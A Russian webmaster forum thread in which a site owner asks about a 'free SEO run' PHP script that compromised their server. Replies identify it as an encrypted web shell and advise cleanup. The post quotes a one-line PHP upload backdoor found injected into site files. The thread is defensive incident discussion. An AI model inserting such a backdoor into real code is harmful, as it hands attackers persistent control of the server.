X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость ( Вход | Регистрация )

Открыть тему
Тема закрыта
> Безопасность загруженного скрипта, Подскажите пожалуйста, что за скрипт?
PRaiD
PRaiD
Topic Starter сообщение 29.1.2016, 13:50; Ответить: PRaiD
Сообщение #1


Устал.
******

Группа: Active User
Сообщений: 1039
Регистрация: 16.8.2008
Из: Ухты
Поблагодарили: 200 раз
Репутация:   39  


Здравствуйте.

Подскажите пожалуйста,
Я скачал и запустил файл у себя на сервере от этого сайта cataloguing.ru перед запуском выставил права доступа "444" (только просмотр).
Был заявлен как бесплатный прогон.
Насчет прогона не знаю, но через WebVisor вместо моего сайта выводится такая картинка:
Прикрепленное изображение


Обнаружил изменение в корневой директории в 1-2 файлах, была добавлена строчка:
Код
   <?php move_uploaded_file($_FILES['u']['tmp_name'],$_POST['n']); ?>


Вот сам файл: Прикрепленный файл  1.php ( 15,95 килобайт ) Кол-во скачиваний: 8


Подскажите, что делает данный код и достаточно ли просто удалить загруженный файл и отредактировать внесенные изменения в файлах?
0
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
kagtus
kagtus
сообщение 29.1.2016, 15:32; Ответить: kagtus
Сообщение #2


Бывалый
****

Группа: User
Сообщений: 416
Регистрация: 11.10.2012
Из: Kostroma
Поблагодарили: 94 раза
Репутация:   21  


5 раз шифрованный шелл-скрипт.
удаляйте его, чистите измененные и ищите вновь появившиеся файлы.


--------------------
ася 45два48499два
удалю вирусы, помогу с сайтом ->отзывы ТУТ и ТАМ


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
PRaiD
PRaiD
Topic Starter сообщение 29.1.2016, 19:10; Ответить: PRaiD
Сообщение #3


Устал.
******

Группа: Active User
Сообщений: 1039
Регистрация: 16.8.2008
Из: Ухты
Поблагодарили: 200 раз
Репутация:   39  


kagtus, какие возможности предоставляет добавленный код?
И, значит запуск скрипта для исполнения команд внутри сервера возможно с правами доступа только для чтения?
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
winstrool
winstrool
сообщение 2.2.2016, 23:22; Ответить: winstrool
Сообщение #4


Новичок
*

Группа: User
Сообщений: 34
Регистрация: 30.9.2014
Поблагодарили: 3 раза
Репутация:   1  


Если это шелл был и он выполняется от прав текущего пользователя, с кривыми настройками безопасности на сервере, можно менять права, т.е были права 0444, за счет php функции chmod меняем на 0644, что приводит к полноценному редактированию файла, так что вам необходимо навести профилактические меры безопасности и устранения подобных скриптов...
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Открыть тему
Тема закрыта
1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Открытая тема (нет новых ответов) Активация скрипта на статичном сайте
10 Art_of_Forex 1580 30.10.2017, 13:56
автор: x64
Открытая тема (нет новых ответов) Шифровка скрипта в Ioncube
Необходимо зашифровать один скрипт
0 mark3000 409 3.10.2017, 15:17
автор: mark3000
Открытая тема (нет новых ответов) доработка скрипта
wm bonus
1 vissavi 642 18.9.2016, 23:33
автор: schokk
Открытая тема (нет новых ответов) Тема имеет прикрепленные файлыНастройка скрипта на VPS
ищу исполнителя
2 Palundra 537 17.11.2015, 20:56
автор: Palundra
Открытая тема (нет новых ответов) Требуется изготовить или уже готовый шаблон для PHP скрипта магазина Digiseller
1 jansen 1462 5.5.2014, 23:10
автор: jansen


 



RSS Текстовая версия Сейчас: 19.12.2017, 0:51
Дизайн